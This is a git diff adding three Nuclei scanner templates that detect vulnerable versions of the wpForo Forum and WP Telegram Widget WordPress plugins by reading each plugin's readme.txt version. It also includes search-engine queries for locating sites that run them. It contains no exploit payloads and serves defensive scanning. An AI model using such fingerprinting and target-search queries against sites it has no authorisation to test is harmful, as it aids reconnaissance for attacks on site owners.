0000000000..3f5e5ea6fa --- /dev/null +++ b/poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml 
@@ -0,0 +1,59 @@ +id: wpforo-3618db85525168de727aa60e2eab2dfa + +info: + name: > + wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml b/poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml new file mode 100644 index 0000000000..8a17ca5bc0 --- /dev/null +++ b/poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml 
@@ -0,0 +1,59 @@ +id: wpforo-65d61d404575f7ac7abdc6590b29296c + +info: + name: > + wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml b/poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml new file mode 100644 index 0000000000..dcf6531a04 --- /dev/null +++ b/poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml 
@@ -0,0 +1,59 @@ +id: wptelegram-widget-a37d54894422d71175e71f451950cb5b + +info: + name: > + WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wptelegram-widget/" + google-query: inurl:"/wp-content/plugins/wptelegram-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wptelegram-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wptelegram-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.27') \ No newline at end of file